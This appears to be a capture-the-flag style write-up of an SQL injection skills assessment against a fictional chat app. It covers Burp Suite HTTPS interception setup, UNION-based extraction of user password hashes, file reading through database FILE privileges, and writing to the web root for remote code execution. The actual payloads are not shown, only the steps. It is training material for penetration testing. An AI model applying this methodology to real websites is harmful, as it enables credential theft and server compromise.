search
Linkedin

Skills Assessment - SQL Injection Fundamentals

hashtag
Scenario

You have been contracted by chattr GmbH to conduct a penetration test of their web application. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

They provided a target IP address and no further information about their website. Perform an assessment specifically focused on testing for SQL injection vulnerabilities on the web application from a "black box" approach.

Chattr login page with fields for username and password, login button, and a person on the phone in an office.

hashtag
Intercepting HTTPS Traffic with Burp Suite

The web application in this skills assessment uses HTTPS, which Burp Suite can not be intercept by default. To do so, it is necessary to either install Burp Suite's Certificate Authority (CA) in your browser, or to use the integrated browser in Burp Suite.

Option 1: Using Burp Suite's Integrated Browser (Chromium)

One way to intercept traffic to websites that use HTTPS is to use the browser integrated into Burp Suite. To do so, simply navigate to the Proxy tab and click Open browser. In addition to intercepting HTTPS traffic, the integrated browser has a couple of Burp Suite's browser extensions pre-installed, such as DOM Invaderarrow-up-right, which is a useful tool for identifying DOM-based XSS.

Burp Suite showing intercepted POST request to chatr login page with username 'jsmith' and password field filled.

Option 2: Installing PortSwigger's CA in your own Browser

The other way to intercept traffic to websites that use HTTPS, is to install BrupSuite's CA into your web browser of choice. PortSwigger has an articlearrow-up-right which documents the process for Chrome, Firefox, and Safari. For example, let's see how it works in Firefox.

After configuring your browser to use Burp Suite as a proxy (default: http://localhost:8080), go to http://burpsuite. You should see the following page:

Burp Suite Community Edition welcome page with CA Certificate button.

Click on CA Certificate and save cacert.der to a known location. This is Burp Suite's CA which will need to import into Firefox, so that the browser will trust the proxy.

Next, head over to Settings, and search for "Certificates". You will need to click on the View Certificates... button shown below:

Firefox settings search results for 'certi' with options to view certificates and security devices.

Inside the Certificate Manager dialog, open the Authorities tab, and click Import. Select the cacert.der file that we just downloaded, check both boxes, and click Ok to import the CA.

Firefox Certificate Manager under Authorities tab, importing a certificate with options to trust CA for websites and email users, OK button highlighted.

We can then utilize the Firefox extension FoxyProxyarrow-up-right to easily and quickly change Firefox proxy settings. This extension is pre-installed in your PwnBox instance and can be installed on your own Firefox browser by visiting the Firefox Extensions Pagearrow-up-right and clicking Add to Firefox to install it.

Once we have the extension added, we can configure the web proxy on it by clicking on its icon in Firefox's top bar and then choosing Options:

FoxyProxy menu with options for "Options," "What's My IP?" and "Log."

Once we're on the Options page, we can click on Add on the left pane, and then use 127.0.0.1 as the IP, and 8080 as the port, name it Burp, and click Save:

Edit Proxy Burp/ZAP settings. Fields for title, color, proxy type, IP address, port, username, and password. Buttons for "Cancel," "Save & Add Another," "Save & Edit Patterns," and "Save."

Finally, we can click on the FoxyProxy plugin icon and select Burp:

FoxyProxy menu with Burp/ZAP enabled. Options for "Options," "What's My IP?" and "Log."

Once that's done, we should now be able to intercept HTTPS traffic in Burp Suite with no issues.

Burp Suite intercepting POST request to chatr login page with username 'jsmith' and password field filled.
circle-info

Note: If you are using PwnBox for the assessment, you do not need to install the Burp certificate separately, as it is pre-installed by default. Just make sure to select the BURP option on the FoxyProxy Firefox plugin.

circle-info

IP : 94.237.51.160:42102

What is the password hash for the user 'admin'?=

Access to our target via Burp Browser :

Try to create an account :

The invitation code is invalid, so let's try an SQL injection! Intercept the request with Burp, go to Repeater, and add the injection:

Now, log in to the "/login" page :

We can acces on chattr, and see conversations with users :

Use search bar and intercept the request :

Let's try to build our SQL Injection :

When we use the ORDER BY value set to 5, we don't have any results :

So we have four columns to work with. Now let's try using UNION injections:

Now, list SCHEMATA :

Check chattr's tables :

List table "Users" content :

Now, get usernames and passwords list from the chattr table :

What is the root path of the web application?

Check our user and their rights:

We have certain rights on FILE. So let's try to read the configuration file for the target's web application.

After some tries, we've conclude to our target used nginx as Web application:

Achieve remote code execution, and submit the contents of /flag_XXXXXX.txt below.

Now, try to write on root path of the web application :

Check if our SQL injection works :

Now, get the flag :

PreviousMitigating SQL InjectionNextSQLMap Overview

Last updated